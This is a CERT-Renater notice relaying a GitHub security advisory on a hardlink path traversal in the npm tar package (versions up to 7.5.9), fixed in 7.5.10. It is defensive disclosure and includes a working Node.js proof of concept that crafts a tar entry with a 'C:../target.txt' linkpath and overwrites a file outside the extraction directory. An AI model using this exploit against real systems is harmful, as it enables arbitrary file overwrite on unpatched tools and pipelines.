=====================================================================
CERT-Renater Note d'Information No. 2026/VULN259
_____________________________________________________________________
DATE : 05/03/2026
HARDWARE PLATFORM(S): /
OPERATING SYSTEM(S): Systems running tar (npm) versions prior to 7.5.10.
=====================================================================

https://github.com/isaacs/node-tar/security/advisories/GHSA-qffp-2rhf-9h96
_____________________________________________________________________

Hardlink Path Traversal via Drive-Relative Linkpath
Severity: High
isaacs published GHSA-qffp-2rhf-9h96 on Mar 4, 2026

Package: tar (npm)
Affected versions: <= 7.5.9
Patched versions: 7.5.10

Description

Summary

tar (npm) can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as C:../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction.

Details

The extraction logic in Unpack[STRIP_ABSOLUTE_PATH] checks for .. segments before stripping absolute roots. What happens with linkpath: "C:../target.txt":

1. Split on / gives ['C:..', 'target.txt'], so parts.includes('..') is false.
2. stripAbsolutePath() removes C: and rewrites the value to ../target.txt.
3. Hardlink creation resolves this against the extraction cwd and escapes one directory up.
4. Writing through the extracted hardlink overwrites the outside file.

This is reachable in standard usage (tar.x({ cwd, file })) when extracting attacker-controlled tar archives.

PoC

Tested on Arch Linux with tar@7.5.9.
PoC script (poc.cjs):

    const fs = require('fs')
    const path = require('path')
    const { Header, x } = require('tar')

    const cwd = process.cwd()
    // File one level above the extraction directory that the hardlink reaches
    const target = path.resolve(cwd, '..', 'target.txt')
    const tarFile = path.join(process.cwd(), 'poc.tar')
    fs.writeFileSync(target, 'ORIGINAL\n')

    // One 512-byte header followed by two zero blocks (end-of-archive marker);
    // a Link entry carries no data blocks
    const b = Buffer.alloc(1536)
    new Header({ path: 'l', type: 'Link', linkpath: 'C:../target.txt' }).encode(b, 0)
    fs.writeFileSync(tarFile, b)

    x({ cwd, file: tarFile }).then(() => {
      fs.writeFileSync(path.join(cwd, 'l'), 'PWNED\n')
      process.stdout.write(fs.readFileSync(target, 'utf8'))
    })

Run:

    cd test-workspace
    node poc.cjs && ls -l ../target.txt

Observed output:

    PWNED
    -rw-r--r-- 2 joshuavr joshuavr 6 Mar 4 19:25 ../target.txt

PWNED confirms outside file content overwrite. Link count 2 confirms the extracted file and ../target.txt are hardlinked.

Impact

This is an arbitrary file overwrite primitive outside the intended extraction root, with the permissions of the process performing extraction.

Realistic scenarios:
- CLI tools unpacking untrusted tarballs into a working directory
- build/update pipelines consuming third-party archives
- services that import user-supplied tar files

Severity

High, 8.2 / 10

CVSS v4 base metrics

Exploitability Metrics
  Attack Vector: Local
  Attack Complexity: Low
  Attack Requirements: None
  Privileges Required: None
  User interaction: Passive

Vulnerable System Impact Metrics
  Confidentiality: None
  Integrity: High
  Availability: Low

Subsequent System Impact Metrics
  Confidentiality: None
  Integrity: High
  Availability: Low

CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:H/SA:L

CVE ID
No known CVE

Weaknesses
CWE-22
CWE-59

Credits
@Jvr2022 (Reporter)

=========================================================
+ CERT-RENATER         | tel : 01-53-94-20-44          +
+ 23/25 Rue Daviel     | fax : 01-53-94-20-41          +
+ 75013 Paris          | email:cert@support.renater.fr +
=========================================================